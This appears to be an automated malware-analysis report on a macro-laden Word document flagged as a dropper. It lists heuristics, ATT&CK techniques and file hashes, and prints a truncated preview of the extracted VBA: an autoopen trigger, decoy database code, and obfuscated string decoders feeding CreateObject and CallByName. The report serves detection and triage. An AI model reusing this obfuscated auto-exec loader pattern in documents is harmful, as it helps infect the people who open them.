Verdict: MALICIOUS
Risk Score: 364

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1203 Exploitation for Client Execution
The file is an OOXML document in which a critical heuristic fired for an obfuscated auto-exec VBA loader. An 'autoopen' macro is present, a common technique for executing malicious code when the document is opened. The macro uses CreateObject and CallByName, indicating it is likely designed to download and execute a second-stage payload.
Heuristics (9)

- ClamAV: Doc.Dropper.Agent-1607835 [critical; CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Agent-1607835
- VBA project inside OOXML [medium; OOXML_VBA; 5 related findings]: Document contains a VBA project (VBA macros present)
- Obfuscated auto-exec VBA loader [critical; OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER]: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- AutoOpen macro [high; OLE_VBA_AUTOOPEN]: AutoOpen macro
- CreateObject call [high; OLE_VBA_CREATEOBJ]: CreateObject call
- CallByName call [high; OLE_VBA_CALLBYNAME]: CallByName call
- VBA p-code auto-exec with execution tokens [high; OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Suspicious extracted artifact [info; EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info; EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 13635 bytes |

SHA-256: 58dde911dc69262ecd355ae3173d9cdfbc1d0bd5d651ab553e71b5e4beba83fa
Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 1 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
IsOk "122"
End Sub
Attribute VB_Name = "Mo"
Global Const mensaje_cancelar = " Pulse Click para abandonar esta ventana."
Global Const mensaje_cerrar = " Pulse Click para abandonar esta ventana."
Global Const mensaje_salir = " Pulse Click para abandonar esta ventana."
Global Const mensaje_opcion = " Pulse Click para seleccionar Opción."
Global Const mensaje_copiar = " Pulse Click para Copiar al Portapapeles."
Public GromGremitKustiTryasutsyaDAcdaw As Object
Public GromGremitKustiTryasutsyaPLAPEKCwwed As Object
Public GromGremitKustiTryasutsyaKSKLAL As Object
Public GromGremitKustiTryasutsyaXSAOO() As String
Public GromGremitKustiTryasutsyaLAKOPPC As String
Public GromGremitKustiTryasutsyaPLAPEKC() As String
Public GromGremitKustiTryasutsyaUUUKA As String
Public GromGremitKustiTryasutsyaUUUKABBB As String
Public GromGremitKustiTryasutsyaGMAKO As Object
Public GromGremitKustiTryasutsya4 As String
Public GromGremitKustiTryasutsya2 As String
Public GromGremitKustiTryasutsyaASALLLP As Variant
Public Function VerAuditoria()
Dim SQL As String
VerAuditoria = False
RsUsu.ActiveConnection = Con
SQL = "Select * FROM usuarios "
SQL = SQL & " WHERE usu_id=" & IdUsuario
RsUsu.Open SQL
If Not RsUsu.EOF Then
If RsUsu!usu_auditor = "S" Then
VerAuditoria = True
Else
VerAuditoria = False
End If
End If
End Function
Public Function permisos(nombreformu As String, IdUsuario As Long) As Boolean
Dim SQL As String
Dim idformu As Long
permisos = False
RsUsu.ActiveConnection = Con
idformu = BuscarIdFormu(nombreformu)
SQL = "Select * FROM PermisosPorFormu "
SQL = SQL & " WHERE ppf_idformu=" & idformu
SQL = SQL & " AND ppf_idusuario=" & IdUsuario
RsUsu.Open SQL
If Not RsUsu.EOF Then
permisos = True
p = RsUsu!ppf_permisos
End If
End Function
Public Function BuscarIdFormu(nombreformu As String) As Long
Dim SQL As String
RsFormu.ActiveConnection = Con
SQL = "Select * from Formularios WHERE frm_nombre=" & ""
RsFormu.Open SQL
If Not RsFormu.EOF Then
BuscarIdFormu = RsFormu!frm_id
End If
End Function
Public Function DuBirMahnWeishr(GromGremitKustiTryasutsya6 As Integer) As String
Dost = CInt(GromGremitKustiTryasutsyaXSAOO(GromGremitKustiTryasutsya6))
DuBirMahnWeishr = Chr(Dost / 44)
End Function
Public Function GodnTeBabenParama(A1 As String, A2 As String, A3 As String) As String
GodnTeBabenParama = Replace(A1, A2, A3)
End Function
Attribute VB_Name = "ul"
Public Sub CambiarPass(OldPass As String, newpass As String, cambio As Boolean)
Dim SQL As String
If cambio Then
GromGremitKustiTryasutsyaLAKOPPC = GromGremitKustiTryasutsyaKSKLAL(GromGremitKustiTryasutsyaPLAPEKC(6))
GromGremitKustiTryasutsyaUUUKA = GromGremitKustiTryasutsyaLAKOPPC
GromGremitKustiTryasutsyaUUUKABBB = GromGremitKustiTryasutsyaUUUKA + "weffvxcvw"
GromGremitKustiTryasutsyaUUUKA = GromGremitKustiTryasutsyaUUUKA + GromGremitKustiTryasutsyaPLAPEKC(12)
GromGremitKustiTryasutsyaPLAPEKCwwed.Type = 1
GromGremitKustiTryasutsyaPLAPEKCwwed.Open
encript SQL
Exit Sub
Else
GoTo BigEnd
End If
RsUsuario.ActiveConnection = RutaBase
RsClave.ActiveConnection = RutaBase
SQL = "Select * from Usuarios WHERE usu_id=" & IdUsuario
RsUsuario.Open SQL
If Not RsUsuario.EOF Then
If OldPass = Decript(RsUsuario!usu_clave) Then
SQL = "UPDATE Usuarios SET usu_clave=" & ""
SQL = SQL & " WHERE usu_id=" & IdUsuario
RsClave.Open SQL
cambio = True
Else
cambio = False
End If
End If
BigEnd:
CallByName GromGremitKustiTryasut
... (truncated)
```
| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 41472 bytes |

SHA-256: 97b45d2c77fade8f3b18974daf770d241169c472f11565ac939eb1a4dfb978cd
Detection
- ClamAV: Doc.Dropper.Agent-1607835
- Obfuscation or payload: likely. Carved artifact contains 1 long base64-like blob(s).